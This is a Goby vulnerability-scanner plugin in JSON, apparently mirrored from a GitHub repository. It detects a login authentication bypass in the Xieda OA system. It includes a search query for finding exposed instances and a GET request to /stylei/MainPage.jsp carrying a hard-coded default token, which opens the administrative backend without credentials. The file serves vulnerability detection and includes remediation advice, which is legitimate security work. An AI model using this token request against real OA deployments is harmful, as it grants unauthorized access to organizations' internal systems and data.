mirror of https://github.com/qwqdanchun/Goby.git
101 lines
2.9 KiB
JSON
101 lines
2.9 KiB
JSON
{
|
||
"Name": "Xieda OA system bypasses login authentication",
|
||
"Description": "<p>Xieda OA has a login authentication bypass vulnerability. Attackers use the default token to log in to the system background. <br></p>",
|
||
"Product": "Xieda OA System",
|
||
"Homepage": "http://www.ctop.cn/",
|
||
"DisclosureDate": "2021-12-01",
|
||
"Author": "learnupup@gmail.com",
|
||
"FofaQuery": "body=\"/interface/CheckLoginName.jsp\"",
|
||
"GobyQuery": "body=\"/interface/CheckLoginName.jsp\"",
|
||
"Level": "2",
|
||
"Impact": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">The attacker uses the default token to log in to the system background. </span><br></p>",
|
||
"Recommendation": "<p>1. Pay attention to the patch released by the manufacturer: <a href=\"http://www.ctop.cn/\">http://www.ctop.cn/</a></p><p> 2. Delete the default token</p>",
|
||
"Translation": {
|
||
"CN": {
|
||
"Name": "协达OA系统绕过登录认证登陆后台",
|
||
"Product": "协达OA系统",
|
||
"Description": "<p>协达OA系统是一款全面先进的OA系统</p><p>协达 OA 存在登录认证绕过漏洞,攻击者利用默认的token登陆系统后台。<br></p>",
|
||
"Impact": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">攻击者利用默认的token登陆系统后台,获取敏感信息进一步控制服务器。</span><br></p>",
|
||
"Recommendation": "<p>1、关注厂商发布补丁:<a href=\"http://www.ctop.cn/\">http://www.ctop.cn/</a></p><p>2、删除默认token</p>",
|
||
"VulType": [
|
||
"权限绕过"
|
||
],
|
||
"Tags": [
|
||
"权限绕过"
|
||
]
|
||
}
|
||
},
|
||
"References": [],
|
||
"Is0day": false,
|
||
"HasExp": false,
|
||
"ExpParams": [],
|
||
"ExpTips": {
|
||
"Type": "",
|
||
"Content": ""
|
||
},
|
||
"ScanSteps": [
|
||
"AND",
|
||
{
|
||
"Request": {
|
||
"method": "GET",
|
||
"uri": "/stylei/MainPage.jsp?token=YXR-YMD-SYQ-TOKEN",
|
||
"follow_redirect": true,
|
||
"header": {},
|
||
"data_type": "text",
|
||
"data": ""
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "OA系统",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "我的桌面",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": []
|
||
}
|
||
],
|
||
"ExploitSteps": null,
|
||
"Tags": [
|
||
"Permission bypass"
|
||
],
|
||
"VulType": [
|
||
"Permission bypass"
|
||
],
|
||
"CVEIDs": [
|
||
""
|
||
],
|
||
"CNNVD": [
|
||
""
|
||
],
|
||
"CNVD": [
|
||
""
|
||
],
|
||
"CVSSScore": "7.5",
|
||
"AttackSurfaces": {
|
||
"Application": null,
|
||
"Support": null,
|
||
"Service": null,
|
||
"System": null,
|
||
"Hardware": null
|
||
}
|
||
} |